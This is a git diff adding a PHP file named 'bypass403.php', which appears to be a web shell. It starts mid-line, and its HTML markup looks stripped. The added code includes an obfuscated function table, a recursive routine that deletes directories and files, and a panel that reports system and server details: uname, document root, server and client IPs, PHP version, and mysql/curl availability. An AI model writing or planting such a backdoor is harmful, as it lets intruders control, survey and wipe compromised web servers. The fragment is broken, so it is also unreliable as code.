diff --git a/php/zxc/bypass403.php b/php/zxc/bypass403.php
new file mode 100644
index 0000000..81c58dc
--- /dev/null
+++ b/php/zxc/bypass403.php
@@ -0,0 +1,171 @@
+swal({title: \"{$status}\", text: \"{$msg}\", icon: \"{$status}\"}).then((btnClick) => {if(btnClick){document.location.href=\"?p=".hex($p).$loc."\"}})";
+}
+function deldir($d) {
+ global $fc;
+ if (trim(pathinfo($d, PATHINFO_BASENAME), '.') === '') return;
+ if ($fc[6]($d)) {
+ array_map("deldir", glob($d . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT));
+ rmdir($d);
+ } else {
+ unlink($d);
+ }
+}
+?>
+
+
+
uname : = $fc[0]() ?>
+doc Root: = "{$_SERVER["DOCUMENT_ROOT"]}"; ?>
+server: = "{$_SERVER["SERVER_ADDR"]}/{$_SERVER["REMOTE_ADDR"]}"; ?>
+domain : = "{$_SERVER["SERVER_NAME"]}"; ?>
+ip server: = getHostByName(getHostName()); ?>
+php Version: = phpversion(); ?>
+mysql: = (function_exists('mysql_connect')) ? "ON" : "OFF"; ?>
+curl: = (function_exists('curl_version')) ? "ON" : "OFF"; ?>
+
+
+